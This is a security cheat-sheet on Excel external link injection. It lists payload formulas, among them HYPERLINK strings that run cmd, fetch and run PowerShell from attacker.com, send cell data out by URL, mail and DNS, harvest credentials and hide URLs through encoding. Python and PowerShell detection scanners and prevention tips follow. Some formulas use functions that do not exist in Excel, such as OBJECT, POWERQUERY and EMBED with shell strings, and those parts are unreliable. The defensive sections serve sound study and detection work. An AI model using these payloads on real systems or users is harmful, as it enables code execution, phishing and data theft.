# Excel External Link Injection

> Attack vectors exploiting Excel's external linking capabilities including hyperlinks, external references, and OLE embedding for malicious purposes.

## 📋 Overview

Excel external links (hyperlinks, external references, and OLE objects) can be manipulated to execute malicious code, exfiltrate data, or perform social engineering attacks when users interact with seemingly legitimate Excel files.

## 🎯 Attack Vectors

### 1. Malicious Hyperlinks

#### Basic Command Execution

```excel
=HYPERLINK("cmd|'/C calc.exe'!A1","Click here for important information")
=HYPERLINK("powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')","Download Report")
=HYPERLINK("rundll32.exe url.dll,OpenURL http://attacker.com/malware.exe","Open Document")
```

#### JavaScript Execution

```excel
=HYPERLINK("javascript:alert('XSS in Excel')","JavaScript Demo")
=HYPERLINK("javascript:window.location='http://attacker.com/steal.php?data='+document.cookie","Click Here")
=HYPERLINK("javascript:document.body.innerHTML='<img src=x onerror=alert(1)>'","Image Link")
```

#### Data Exfiltration via URLs

```excel
=HYPERLINK("http://attacker.com/collect?user="&ENCODEURL($A$1)&"&data="&ENCODEURL($B$1),"Submit Data")
=HYPERLINK("http://attacker.com/exfil?excel="&ENCODEURL(CELL("filename",A1)),"Save Progress")
=HYPERLINK("mailto:attacker@evil.com?subject=Excel%20Data&body="&ENCODEURL(A1&A2),"Email to Support")
```

#### File Protocol Abuse

```excel
=HYPERLINK("file:///C:/Windows/System32/calc.exe","Open Calculator")
=HYPERLINK("file://attacker-server/share/malware.exe","Install Updates")
=HYPERLINK("file:///C:/Users/"&ENCODEURL($A$1)&"/Documents/secrets.txt","View Document")
```

### 2. External Reference Injection

#### Remote Workbook References

```excel
='http://attacker.com/malicious.xlsx'!Sheet1!A1
='\\attacker-server\share\[payload.xlsx]Sheet1'!$A$1
='https://evil.com/excel/[malicious.xlsx]Sheet1'!R1C1
```

#### Network Resource Exploitation

```excel
='\\192.168.1.100\C$\Windows\System32\calc.exe'!A1
='http://attacker.com/ftp/[payload.xls]Sheet1'!$A$1
='file://attacker-server/malicious.csv'!A1
```

#### Dynamic External References

```excel
=INDIRECT("'http://attacker.com/["&A1&".xlsx]Sheet1'!A1")
=INDIRECT("'\\server\share\["&B1&".xlsx]Sheet1'!A1")
=INDIRECT("file:///C:/temp/["&C1&".csv]A1")
```

### 3. OLE Object Injection

#### Embedded Malicious Objects

```excel
# Create OLE object with malicious content
=EMBED("Package","cmd.exe /c calc.exe")
=EMBED("Package","powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')")
```

#### Package Manager Abuse

```excel
# Malicious package execution
=HYPERLINK("package:calc.exe","Open Calculator")
=HYPERLINK("package:powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')","Run Update")
```

#### COM Object Hijacking

```excel
# Malicious COM object execution
=OBJECT("WScript.Shell").Run("calc.exe")
=OBJECT("Shell.Application").ShellExecute("powershell.exe","-Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')")
```

### 4. Data Connection Injection

#### Malicious Data Connections

```excel
# Power Query with malicious connections
=POWERQUERY("Web.Contents(""http://attacker.com/malicious-data"")")
=POWERQUERY("Csv.Document(File.Contents(""http://attacker.com/payload.csv""))")
```

#### SQL Injection via Connections

```excel
# Malicious database connection
=SQL.REQUEST("DSN=attacker;UID=admin;PWD=pass;Database=evil;Query=EXEC xp_cmdshell 'calc.exe'")
=ODBC.CONNECTION("Driver={SQL Server};Server=attacker.com;Database=master;EXEC xp_cmdshell 'calc.exe'")
```

### 5. Advanced Link Techniques

#### Protocol Smuggling

```excel
=HYPERLINK("res://C:\\Windows\\System32\\calc.exe","Open Resource")
=HYPERLINK("about:blank<script>alert(1)</script>","About Page")
=HYPERLINK("data:text/html,<script>alert('XSS')</script>","HTML Data")
```

#### DNS Tunneling

```excel
=HYPERLINK("http://"&A1&".attacker.com","Check Status")
=HYPERLINK("http://data-"&ENCODEURL(B1)&".attacker.com/collect","Upload Data")
=HYPERLINK("dns://"&C1&".attacker.com","DNS Query")
```

#### SMB/NetBIOS Attacks

```excel
=HYPERLINK("\\\\attacker.com\\share\\malware.exe","Install Software")
=HYPERLINK("\\192.168.1.100\\IPC$","Network Connection")
=HYPERLINK("file://\\\\attacker\\pipe\\namedpipe","Named Pipe")
```

### 6. Social Engineering Links

#### Credential Harvesting

```excel
=HYPERLINK("http://attacker.com/office365-login.html","Login to Microsoft 365")
=HYPERLINK("https://evil.com/outlook-login.html","Check Email")
=HYPERLINK("http://phishing.com/sharepoint-login.html","Open SharePoint")
```

#### Fake Update Links

```excel
=HYPERLINK("http://attacker.com/updates/office-update.exe","Install Office Updates")
=HYPERLINK("http://evil.com/security-patch.exe","Download Security Patch")
=HYPERLINK("http://malware.com/flash-update.html","Update Flash Player")
```

#### Document Abuse

```excel
=HYPERLINK("http://attacker.com/download-invoice.pdf","Download Invoice")
=HYPERLINK("http://evil.com/view-contract.docx","View Contract")
=HYPERLINK("http://malware.com/open-spreadsheet.xlsx","Open Spreadsheet")
```

### 7. Conditional Link Attacks

#### Time-Based Triggers

```excel
=IF(NOW()>TIME(17,0,0),HYPERLINK("cmd|'/C calc.exe'!A1","After Hours Link"),"Normal Link")
=IF(TODAY()>DATE(2024,12,31),HYPERLINK("http://attacker.com/exploit","Expired Link"),"Current Link")
```

#### Data-Dependent Links

```excel
=IF(A1="admin",HYPERLINK("cmd|'/C net user admin password'!A1","Admin Access"),"Normal Access")
=IF(B1>1000,HYPERLINK("http://attacker.com/high-value","High Value Link"),"Regular Link")
```

#### Logic-Based Triggers

```excel
=IF(AND(A1="trigger",B1="execute"),HYPERLINK("powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')","Execute"),"Normal")
=IF(OR(C1="urgent",D1="critical"),HYPERLINK("\\\\attacker\\share\\malware.exe","Urgent Update"),"Standard Link")
```

### 8. Obfuscation Techniques

#### URL Encoding

```excel
=HYPERLINK("http%3A%2F%2Fattacker.com%2Fpayload.exe","Encoded Link")
=HYPERLINK("h%74%74p%3A%2F%2Fevil%2Ecom%2Fexploit%2Eps1","Heavily Encoded")
=HYPERLINK("http://attacker.com/"&CHAR(104)&CHAR(116)&CHAR(109)&CHAR(108),"Character Encoding")
```

#### Function-Based Obfuscation

```excel
=LEFT("http://attacker.com/payload.exe",LEN("http://attacker.com/payload.exe"))
=SUBSTITUTE("ht@tp://attacker.com/payload.exe","@","")
=REPLACE("http://good.com/safe.exe",1,15,"http://attacker.com")
```

#### String Manipulation

```excel
=HYPERLINK(CONCAT("http://","attacker.com","/payload.exe"),"Concatenated Link")
=HYPERLINK(TEXTJOIN("",TRUE,"http","://","attacker",".com","/exploit"),"Joined Link")
=HYPERLINK("http://attacker."&IF(A1="test","test","prod")&".com/payload.exe","Conditional Domain")
```
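
For detection, the consequence of the obfuscation patterns above is that a regex run over the raw formula text never sees the final URL. The following added example (not part of the original page) folds constant string building (`&`, `CHAR`, `CONCAT`, `TEXTJOIN`) and percent-encoding before matching; the function names are hypothetical, the sample formulas are the ones shown above, and parts that depend on cell values or other functions are left unresolved.

```python
import re
from urllib.parse import unquote

LIT = r'"((?:[^"]|"")*)"'  # Excel string literal; "" is an escaped quote
CONCAT_CALL = re.compile(
    r'(?i)\b(?:CONCAT(?:ENATE)?\(|TEXTJOIN\(\s*""\s*,\s*(?:TRUE|FALSE)\s*,)'
    r'\s*((?:"[^"]*"\s*,\s*)*"[^"]*")\s*\)')
URL = re.compile(r'(?i)\b(?:https?|ftp|file)://[^\s"\']+')

def _char(m):
    # CHAR(34) is a double quote, which must be doubled inside a literal
    return '"' + chr(int(m.group(1))).replace('"', '""') + '"'

def _join(m):
    # Concatenate the all-literal arguments of CONCAT / TEXTJOIN("",...)
    return '"' + "".join(re.findall(r'"([^"]*)"', m.group(1))) + '"'

def fold_literals(formula: str) -> str:
    """Fold constant string building, then percent-decode the result."""
    s = re.sub(r'(?i)\bCHAR\((\d{1,3})\)', _char, formula)
    prev = None
    while prev != s:  # repeat until nothing more folds
        prev = s
        s = re.sub(LIT + r'\s*&\s*' + LIT, r'"\1\2"', s)
        s = CONCAT_CALL.sub(_join, s)
    return unquote(s)

def hidden_targets(formula: str) -> list:
    """URLs visible only after folding, i.e. ones a raw-text regex misses."""
    raw = set(URL.findall(formula))
    return sorted(set(URL.findall(fold_literals(formula))) - raw)

# Sample formulas copied from the obfuscation examples on this page
SAMPLES = [
    '=HYPERLINK("h%74%74p%3A%2F%2Fevil%2Ecom%2Fexploit%2Eps1","Heavily Encoded")',
    '=HYPERLINK("http://attacker.com/"&CHAR(104)&CHAR(116)&CHAR(109)&CHAR(108),"Character Encoding")',
    '=HYPERLINK(TEXTJOIN("",TRUE,"http","://","attacker",".com","/exploit"),"Joined Link")',
]

if __name__ == "__main__":
    for formula in SAMPLES:
        print(hidden_targets(formula), "<-", formula)
```

A non-empty result is itself a useful signal: a legitimate workbook rarely assembles a URL from fragments or character codes.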

## 🛡️ Detection Techniques

### Behavioral Indicators

* Unexpected network connections from Excel
* Execution of suspicious processes via Excel
* Unusual hyperlink patterns in Excel files
* External references to unknown domains

### Technical Detection

```powershell
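# Monitor Excel network connections (no error when Excel is not running)
$excelPids = (Get-Process excel -ErrorAction SilentlyContinue).Id
Get-NetTCPConnection | Where-Object { $_.OwningProcess -in $excelPids }

# Scan Excel files for malicious links. An .xlsx file is a ZIP archive, so
# search the XML parts inside it; the raw bytes are compressed and never match.
Add-Type -AssemblyName System.IO.Compression.FileSystem
Get-ChildItem -Path "C:\Users\*\Downloads\*.xlsx" | ForEach-Object {
    $file = $_.FullName
    $zip = [System.IO.Compression.ZipFile]::OpenRead($file)
    try {
        foreach ($entry in $zip.Entries) {
            $reader = New-Object System.IO.StreamReader($entry.Open())
            $content = $reader.ReadToEnd()
            $reader.Dispose()
            if ($content -match "cmd\|\s*'?\s*/c|powershell.*IEX|rundll32") {
                Write-Warning "Suspicious content found in $file ($($entry.FullName))"
            }
        }
    } finally { $zip.Dispose() }
}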
```

### Static Analysis

```regex
# Regex patterns for malicious links
(?i)(cmd\|\s*'?\s*/c|powershell.*iex|rundll32)
(?i)(javascript:|data:|file:)
(?i)(\\\\.*\\|http.*attacker|\.exe$)
```
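
Static analysis is more reliable when it follows the OOXML package structure instead of searching text: links inserted through the UI, linked workbooks and linked OLE objects are stored as relationships with `TargetMode="External"` in the `.rels` parts, while `HYPERLINK()` calls live in worksheet `<f>` elements. The scanner below is an added example, not code from the original page; the function names and the sample workbook (built in memory from targets shown on this page) are constructed for illustration.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET  # for untrusted files in production, parse with defusedxml

REL = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
FORMULA = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}f"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# The page's static-analysis patterns, tolerant of the quote in cmd|'/C
RISKY = re.compile(r"cmd\|\s*'?\s*/c|powershell.*iex|rundll32|javascript:|data:|file:|\\\\", re.I)

def scan_xlsx(data: bytes) -> list:
    """Return (part, kind, value) for every external target and risky formula."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                # Hyperlinks, linked workbooks and linked OLE objects are all
                # relationships with TargetMode="External".
                for rel in ET.fromstring(z.read(name)).iter(REL):
                    if rel.get("TargetMode") == "External":
                        kind = rel.get("Type", "").rsplit("/", 1)[-1]
                        findings.append((name, kind, rel.get("Target", "")))
            elif name.startswith("xl/worksheets/") and name.endswith(".xml"):
                for f in ET.fromstring(z.read(name)).iter(FORMULA):
                    if f.text and RISKY.search(f.text):
                        findings.append((name, "formula", f.text))
    return findings

def build_sample() -> bytes:
    """Constructed sample: only the package parts the scanner reads."""
    rels = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">%s</Relationships>'
    rel = '<Relationship Id="rId%d" Type="' + OFFICE_REL + '%s" Target="%s"%s/>'
    ext = ' TargetMode="External"'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml",
                   '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
                   '<sheetData><row r="1"><c r="A1"><f>SUM(C1:C9)</f></c><c r="B1">'
                   "<f>HYPERLINK(\"cmd|'/C calc.exe'!A1\",\"Click here\")</f></c></row>"
                   '</sheetData></worksheet>')
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels % (
            rel % (1, "hyperlink", "http://attacker.com/office365-login.html", ext)
            + rel % (2, "drawing", "../drawings/drawing1.xml", "")))
        z.writestr("xl/externalLinks/_rels/externalLink1.xml.rels", rels % (
            rel % (1, "externalLinkPath", "file://attacker-server/share/payload.xlsx", ext)))
    return buf.getvalue()

if __name__ == "__main__":
    for finding in scan_xlsx(build_sample()):
        print(finding)
```

Every external relationship is reported regardless of its target, so the output doubles as an inventory to compare against an allowlist of expected domains and shares.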

## 🚫 Prevention Measures

### Excel Security Settings

1. **Disable automatic hyperlink following**
2. **Block external references** via Trust Center
3. **Enable Protected View** for files from the internet
4. **Disable OLE package embedding**
5. **Require macro approval**

### Network Controls

1. **Block suspicious domains** at DNS/firewall level
2. **Monitor outbound connections** from Office applications
3. **Implement URL filtering** for HTTP/HTTPS traffic
4. **Block SMB traffic** to untrusted networks

### User Training

1. **Verify hyperlink destinations** before clicking
2. **Be suspicious of urgent** or threatening messages
3. **Check file extensions** and sources
4. **Use preview mode** for suspicious documents

***

*⚠️ This documentation is for educational purposes and authorized security testing only.*
